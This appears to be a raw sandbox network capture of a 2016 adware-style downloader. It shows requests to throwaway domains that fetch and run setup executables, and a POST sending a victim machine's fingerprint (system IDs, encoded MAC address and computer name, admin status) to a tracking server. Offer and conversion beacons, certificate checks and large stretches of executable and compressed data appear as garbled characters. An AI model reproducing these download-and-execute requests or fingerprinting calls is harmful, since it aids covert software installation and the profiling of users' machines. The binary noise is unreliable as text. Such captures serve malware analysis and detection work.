.......N..................@...BSS..........P"......6".................
.idata..81...P#..2...6".............@....tls....0.....#......h".......
...........rdata........#......h".............@..P.reloc...m....#..n..
.j".............@..P.rsrc...IN... %..P....#.............@..P..........
...........F-.............@..P........................................
......................................................................
....................................................@...Boolean.......
....@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...
Smallint..........p.@...Integer.............@...Byte............@...Wo
rd............@...Cardinal............@...Int64...................@...
Double..@...@...Currency....@...ShortString.....@...WordBool..........
.@..False.True..@.@...LongBool.........<.@..False.True..h.@...Strin
gt.@...WideString..@...Variant.@...@...OleVariant..@..................
.............@..........C@..C@..C@..C@..C@..@@..A@.TA@..TObject..@

<<< skipped >>>

GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.0

Host: wet.sodcattilyrem.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 60676

Connection: close

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="583afdedde2bb_ua.exe"

X-Powered-By: ASP.NET

Date: Sun, 27 Nov 2016 15:38:21 GMT

X-Cache: Miss from cloudfront

Via: 1.1 1280e48937eca7de58e32cd35415f48a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: oQ7y_HWecgaCXkCxikw8vq21OYN4z3k2ejmMGV3mJIa-ra6vjGhk6w==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................n.......B...8............@..............
............`............@.................................4........@.
.........................d............................................
........................................text....m.......n.............
..... ..`.rdata..b*.......,...r..............@..@.data....~...........
...............@....ndata.......0...........................rsrc......
..@......................@..@.reloc..2....P......................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ

<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 523

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1480261117&ver=1.1.5.26
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Sun, 27 Nov 2016 15:38:39 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
N">.<html>.    <head>.        <meta http-equiv="cont
ent-type" content="text/html; charset=UTF-8" /> .        <title&
gt;DownloadManagerModern</title>...<script type="text/javascr
ipt">...  var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... 
 var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba
',  'UCwebAccelerator', 'UltimateSecurityPackage' ,  'TotalSecurity', 
'TotalSecurityIN', 'TotalSecurityRU'];...</script> .        <
base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<
;link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownlo
ad.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />        <
;script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V3
8/amipb.js"></script>.        <script type="text/javascrip
t">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.
png";..var g_r_appname="installer";..var g_r_cmdline="\/S";..         
   var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_addition
al_offer_list = '1';.            var g_finish_install_button = '1';.  
          var g_popup_install_all = '1';.            var g_eula = 'VGh
lIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZ..32e8..pb
GUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmc
gdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51a
W5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiw<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT

If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.geotrust.com


HTTP/1.1 200 OK

Server: Apache

ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"

Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Content-Length: 325

Connection: keep-alive

Content-Type: application/pkix-crl

0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equi
fax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%
...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-
g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q..
.....N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: 
Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modi
fied: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 G
MT..Content-Length: 325..Connection: keep-alive..Content-Type: applica
tion/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax
1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207
152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H..........
..44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..
u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0

Host: VVV.dosecuretrips.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Setup__2140_il2.exe"

Content-Type: application/x-msdownload

Date: Sun, 27 Nov 2016 15:38:33 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Last-Modified: Sun, 27 Nov 2016 15:38:33 GMT

Pragma: no-cache

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: Setup__2140_il2.exe

Content-Length: 716288

Connection: Close

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L.....3X.................`...................p....@............
..............@............@..........................................
...8E......................DZ.. u..................................@..
..........p..\............................text...._.......`...........
....... ..`.rdata..T....p.......d..............@..@.data....[...0...4.
.................@....rsrc...8E.......F...J..............@..@.reloc..4
].......^..................@..B.......................................
......................................................................
......................................................................
......................................................................
................................................ ..........3.9.....V..
......D$.....^...j .UNF..#...3.9.tRj.h|.F..M..E......]..].......]..}..
.E.s..E.SSS.6Ph..F......YY...6...tF.Sj..M.......I....3..H..H....3...uH
..|uH..xuH..tuH...uH..tuH..3.9..HH.t..=.HH....HH.s...HH..j...SF.......
}.j.....F.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G
\........F............................................................
................................_x._|................V........D$..t.V.
c=..Y..^...j...SF......j...vH.X3.3..}....vH...F...vH....vH.f...vH.

<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 19:25:21 GMT

Expires: Mon, 28 Nov 2016 19:25:21 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 245603

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..2016112
3130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.o...........20161123130113Z....20161130130113Z0...*.H................
...[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....
:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E..
.|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....
P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content
-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:25:21 GMT.
.Expires: Mon, 28 Nov 2016 19:25:21 GMT..Server: ocsp_responder..Conte
nt-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAME
ORIGIN..Age: 245603..Cache-Control: public, max-age=345600..0.........
.0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k
0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o........
...20161123130113Z....20161130130113Z0...*.H...................[...^..
=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d...
.M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......Q
Xl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,.
.......\...jk....).......:....."........

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 19:31:39 GMT

Expires: Mon, 28 Nov 2016 19:31:39 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 245227

Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..2016112
3130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.ssP.QfKs....20161123130507Z....20161130130507Z0...*.H................
..{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.
....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.
[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{...
......|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..C
ontent-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:31:3
9 GMT..Expires: Mon, 28 Nov 2016 19:31:39 GMT..Server: ocsp_responder.
.Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options
: SAMEORIGIN..Age: 245227..Cache-Control: public, max-age=345600..0...
.......0..... .....0......0...0......J......h.v....b..Z./..20161123130
507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP
.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u
/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....
z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(
..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.......
..|..<63@...B....e.....~.......T^..TO..l(.v....

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 20:12:58 GMT

Expires: Mon, 28 Nov 2016 20:12:58 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 242749

Cache-Control: public, max-age=345600
0..........0..... .....0......0...0......J......h.v....b..Z./..2016112
3130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.ssP.QfKs....20161123130507Z....20161130130507Z0...*.H................
..{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.
....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.
[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{...
......|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..C
ontent-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:5
8 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder.
.Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options
: SAMEORIGIN..Age: 242749..Cache-Control: public, max-age=345600..0...
.......0..... .....0......0...0......J......h.v....b..Z./..20161123130
507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP
.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u
/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....
z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(
..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.......
..|..<63@...B....e.....~.......T^..TO..l(.v....

GET /movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: text/html; charset=UTF-8

Date: Sun, 27 Nov 2016 15:38:41 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 36844

Connection: keep-alive
.............r.G.%...".s.......%.Dr.$!..$....h......P.B..>..w.9....
.9.="#....z.l.l.v[`UVF.......g.?..-o.G...j.....?..d.X<...v...j&....
..t._.........].....r0_....V...o.D...ry.3......._wV......`9>......t
9..w.....b.~../'........M.W..[...l>.^.g....a..O....l.,.........O...
.....O...`..8.LF....M....|4y....K.V.f..o5..............h6}x6......t..K
... ..._.my;.-.G#.._u.X<\.......'.E....i~.k^...fg....7...[.......|.
............?X<.=.x0.0xpu....x....b2...&......./....?=..7...O..?...
......_..6....=../...........r{0.X]a?.....}9y.....n....h..w...........
............h._/^.....a..........`q;={...-.g./........w...x..../G...h.
......mPv8.y.&....3b.{p.........dg.h.Ml..............`............O...
..?y.....V.....|t1.......l7...-Q...o.{<(.>|.....]n...W....nGsq..
!.=...._?.....w.'....h.._.......t.O...........}.......Gz.gx8.^..c.y<
;|...>>.||.X.-A[..._........~.....~..o.=.....}.O.<z....O..y..
.W....;....w;.;}|.3...7;O.........t...tt1x..^...t....w.[..y.56'?....{.
..={h....Q....s.H.g.M"=;..o..?.....9.o...>.N..t>...../.8.[/~...p
P.Z.0.`.<[,......j9...1.}..Ow1..`1j............[1....EK....W<{8x
.,g...z>.4..F.^.....l....5W.G0...O<.&C......_...f6o0.d|..:.&..\.
.$.N...?....WW...d >.....2@/0..3.[.\.t./:...|..G3......../......`.G
....;........O..U.cr}:.N....MG8I.i....S5.s...S.%.)s:^.<..D.\..Q....
. ._hnd;..x..v..2...:3...w......gA......yh.P........%.;."....Z._;....j
ZnY...l....hN'......_'.s. I.f.|.&h.lT..a.............I|}...7.{-A...xa.
.......%,.GgP.i...<;.w7...2..........z.qCU.3....B-.E.0'........<<< skipped >>>

GET /js/main.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: application/javascript

Date: Sun, 27 Nov 2016 15:38:45 GMT

ETag: W/"582622c6-368b"

Last-Modified: Fri, 11 Nov 2016 19:57:58 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 4244

Connection: keep-alive
...........[[s...~..h...H.HJ%..#{....bE.%.a..;.4.&.3....D...)...n...f.
..,.[............?@....).!....\z....*...>....>.\.l.j..$....c.x..
..x....5...........f.]s-....g.\a..8[bW.c.)x.g.k..[x.19ds....=...&..,..
R..1n..7...M.....X,^..W.oU..K.?Q....B.`.P.\.?Y}......juk.g...U...S...w
......||...O?G...........b..w.Z:X.*......@5}Y..n../......Z..ll.....0.X
..O.w..5.r.,...O.....E0.y........Gu|..?..[.j5Z.xl1...M/.R.<M...H...
.MN. H4...P.Ly.Z.zy.g....GY.T.V`X......7=...... .f.E...[.>[zZz8.l.o
......O<nw.R....L.x..AA.....5.C.i.N.....gZ..[m.S.q./g..\C.B,.6.X...
.......237F'..).Z.`.0...pX0c..}.6_.|CA.....g..u..........l..a-.q..g..k
.#....l....fXfC.. ...f.\.;`.aZe&.`$.B..(....h....D..."~....`......J(.,
.....J.gf.FF.bR5..Nj=.75......4.>.6.L..\.s...".,.:y... g..tK..s....
..c..k.$.......:...w...*`=W....Ht....&.LT..(... 5.9....&...Di..mnQ...6
.D.R(U.uz..f.%...A...P..yT.um...`.cj=S..x. ..W...1..^b0...n2....R5Z...
..........&3........._._._.|...Q..g.I.....&.j.|.^T.;.P.^QT.F..<...o
..1.V.2..!^..,.yp...;...dr...~.r....Y.:.}.....hh.....O\H.(.0'.aZC..&..
..Y.am...l.m........S&.....k........H.........4...`....7.-..&7....k...
..z.O.fh.f...$~!..8.s.......Cc...z..kk..SxI.:..l.V-.F...9.P....e<..
;..;.}4......a........a.......O...=...a.........{...]..i;.....>V...
..c`....-.....7_.Z<...sr.$. .@.a.Wx.I...>UT`....{wB.n..#1.OcRr..
c@}.....V.o....../k...X......{_.{.3d.4.\A... a.D......-.......P..d.;.w
.;_......Z.BnD.q....P....g$Lq.....e........0.<;..LU.}.Z|...K,e..*,.
..#..#..........?.*........h.j...V.\R.....%.,6..b........m.. T...k<<< skipped >>>

GET /img/favicon/cinemaden.com/favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: tour.cinemaden.com

Connection: Keep-Alive

Cookie: _ga=GA1.2.1439064958.1480261126; _gat=1


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/x-icon

Date: Sun, 27 Nov 2016 15:38:47 GMT

ETag: "57325088-1536"

Last-Modified: Tue, 10 May 2016 21:20:08 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 5430

Connection: keep-alive

............ .h...&...  .... .........(....... ..... .....@...........
......................................................................
.................................!....................................
...........................................q..........................
.....#...[...........5...i...........9...............................5
...%...........a.......................................%...A...m...o..
.....'...............}...........................!...o................
.......................c..............................................
.....................................G................................
...........#.......................#...?.......S.......5..............
.....!...................................e............................
...................................q..................................
.................'.......#.......{.......................%............
...................................{..........._...!..................
.................k...!...........1...)................................
......................................................................
..............................................(... ...@..... .........
......................................................................
.............................................................#........
...........................................1..........................
......................................................................
.......................................................Q..........

<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT

If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.geotrust.com


HTTP/1.1 200 OK

Server: Apache

ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"

Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Content-Length: 325

Connection: keep-alive

Content-Type: application/pkix-crl

0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equi
fax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%
...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-
g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q..
.....N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: 
Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modi
fied: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 G
MT..Content-Length: 325..Connection: keep-alive..Content-Type: applica
tion/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax
1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207
152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H..........
..44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..
u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...

GET /stats.php?bu=cp&c=&step= HTTP/1.0

Host: get.gunnightmar.club

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Sun, 27 Nov 2016 15:38:23 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 62fcc6919801a5602c53d055b177c4f9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: v0nTILH8B7lO0atK9IGzAtS5FRJUiahDpMIx_3u_xZEqL90Dvtp00w==

GET /stats.php?bu=rx&c=&step=1 HTTP/1.0

Host: get.gunnightmar.club

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Sun, 27 Nov 2016 15:38:32 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 d79148f01e44f5598c15bdd5ce1c1997.cloudfront.net (CloudFront)

X-Amz-Cf-Id: qKy6xKjkeNG7i9e4v7zZ6rDXDkkh0I6BRjbfGxCgBigmeRoNylQypw==

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1

Cache-Control: max-age = 564348

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: g.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.1

Content-Type: application/ocsp-response

Content-Length: 1362

content-transfer-encoding: binary

Cache-Control: max-age=563527, public, no-transform, must-revalidate

Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT

Expires: Sun, 4 Dec 2016 04:06:13 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Connection: keep-alive
0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..2016112
7040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U
....... ...:.....20161127040613Z....20161204040613Z0...*.H............
.n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....
{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'...
...~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~
.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d.
.......:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U
....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'Geo
Trust Global CA TGV OCSP Responder 40.."0...*.H.............0.........
[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...
Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3
..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo...........
..v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#.
.0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0...U..
.........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H......
.........aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.
X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...
gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U...
...w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....<<< skipped >>>

GET /report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: ee.wintervenepest.bid


HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:30 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X
-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-
Length: 0..

GET hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: will.ymuscaesnortin.bid

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 5248

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:22 GMT

X-Cache: Miss from cloudfront

Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: l1my4O3razMEiR5YydeNmDYHWI5pPOfTnr-Yh5bIzfchTkSNUDbItg==
h.......z*Z..-..p.`...i...tg...N....D.@.D^.}D.c..;Y..k.......(...i....
....o...A....,B.>..........ocZ..........2O.......K..Re.....4.y....\
!....4....h...f.^...2.........Uj....-*;Zr.L.$K..A.3.B.e....\>./....
..."H'..p.>A>..>....(...-/.7X...h.90.OO..1....@.^#}....).z...
.~I.z4.7p.9.'...1..p..lb..cT.AX9aN..L........g.."q0oU(...c....Y|...n..
.....x......$q.=.9.,..|.k^OF~....i.0....gnV......$n.i.I>*.#......B&
lt;k..k,i.R..,.....:......OA.zE6*Q.1.`.F.T.v......A..I....G.....x..7kH
.. .Z....f`.jb.y}".........e.mUd...,."...&...=g.....ia..3. ,....."uDT.
